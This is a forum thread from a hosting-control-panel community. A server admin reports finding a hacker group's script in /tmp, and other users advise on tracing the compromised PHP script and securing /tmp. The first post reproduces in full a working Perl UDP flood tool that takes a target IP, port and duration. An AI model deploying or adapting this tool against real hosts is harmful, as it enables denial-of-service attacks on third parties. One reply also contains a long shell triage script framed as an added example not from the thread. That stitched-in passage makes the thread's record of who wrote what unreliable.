
Script in tmp made by Hacker

Discussion in 'General Discussion' started by jeroman8, Dec 14, 2004.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    I had a script made by a hacking team called UMHCreW in my TMP folder.
    Anyone know what it is ?

    Is it ok to remove/delete ALL files in the tmp folder or will this
    screw something up ?
    I have old files and a lot of folders and crazy files in there.

    Here's the script...


    #!/usr/bin/perl
    #####################################################
    # Simple but agressive udp flood.
    #
    # gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
    #
    # lemurian from UMHCreW @ eu.undernet.org #deadworld
    ######################################################

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "UMHCreW 2004\n";
    printf "$0 <ip> <port> <time>\n";
    printf "if arg1/2 =0, randports/continous packets.\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

    printf "Simpe but Agressive udp flood - lemurian@UMHCreW\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
    }
    if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
    }

    packets:
    for (;;) {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }

    randpackets:
    for (;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Well, that's just the symptoms of a problem. What is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership should be first.
  3. GOT

    GOT Get Proactive!
    PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,015
    Likes Received:
    34
    Trophy Points:
    178
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Good advice for sure chirpy.

    Also make sure that you secure your /tmp directory (/scripts/securetmp is the easiest method.)
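    The triage steps chirpy and GOT describe (check the file's owner, confirm it is not running, tar it up with ownership preserved before deleting anything, and verify /tmp is mounted noexec as /scripts/securetmp arranges) as an added example script; this is not code from the thread or from cPanel. It assumes a Linux host with /proc and GNU stat, tar and sha256sum, and every path in it is a constructed placeholder.

```shell
#!/bin/sh
# Triage helpers for a suspicious file found in /tmp: report its owner, check whether
# it is executing, preserve it with ownership intact before anything is deleted, and
# confirm /tmp is mounted noexec. Assumes Linux (/proc, GNU stat/tar/sha256sum).
# Owner:group of the file; "nobody:nobody" points at a web-served PHP script.
file_owner() {
    stat -c '%U:%G' "$1"
}
# PIDs whose command line mentions the file (is it still running?). Matching is
# done in the shell so no child process carries the path in its own argv.
running_pids() {
    f="$1"; found=""
    for p in /proc/[0-9]*; do
        c=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null || true)
        case "$c" in *"$f"*) found="$found ${p#/proc/}";; esac
    done
    echo "$found"
}
# Mount options of /tmp from /proc/mounts; "noexec" should be among them
# (what /scripts/securetmp sets up). Prints "-" when /tmp is not its own mount.
tmp_mount_opts() {
    o=$(awk '$2 == "/tmp" { print $4 }' /proc/mounts 2>/dev/null || true)
    echo "${o:--}"
}
# Tar the file up (owner, mode and mtime are stored in the archive), write a
# stat/sha256 record next to it, then remove the original. Prints the archive path.
quarantine_file() {
    f="$1"; q="$2"; n=$(basename "$f")
    mkdir -p "$q"
    a="$q/$n.$(date +%Y%m%d%H%M%S).tar"
    { stat "$f"; sha256sum "$f"; } > "$q/$n.meta"
    tar -cf "$a" -C "$(dirname "$f")" "$n"
    rm -f "$f"
    echo "$a"
}
# One report per path; refuses to quarantine while the file is still running.
triage_report() {
    f="$1"; q="$2"; pids=$(running_pids "$f")
    echo "file: $f  owner: $(file_owner "$f")  /tmp opts: $(tmp_mount_opts)"
    [ -n "$pids" ] && { echo "still running as pid(s):$pids; stop them first"; return 2; }
    echo "quarantined to: $(quarantine_file "$f" "$q")"
}
# Usage (constructed paths): sh triage.sh /tmp/udp /root/quarantine
[ $# -ge 2 ] && triage_report "$1" "$2"
```

The .meta record keeps the original ownership and hash even if the archive is later extracted as root, so the nobody:nobody evidence survives.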
  4. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    yes it's nobody that owns the file

    How can I track which php script does this ?
    Just some basic stuff so I can go from there would be nice :)
     
  5. GOT

    GOT Get Proactive!
    PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,015
    Likes Received:
    34
    Trophy Points:
    178
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Short of running php as suexec you'll really not be able to track it down, save for searching every php file and even that may not turn it up.

    You cannot prevent php from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not) and you should either spend some time reading up on how to secure your linux server, or contract it to one of the several reputable server admins hanging around.
  6. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    Thank you!

    Is it ok to delete all old tmp files ?
    They are just there right, leftovers...
     
  7. GOT

    GOT Get Proactive!
    PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,015
    Likes Received:
    34
    Trophy Points:
    178
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Yes, it is generally safe to delete them. In some cases if you are running Fantastico, it might cause a decoder error.
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Make sure that you don't delete the mysql lock file.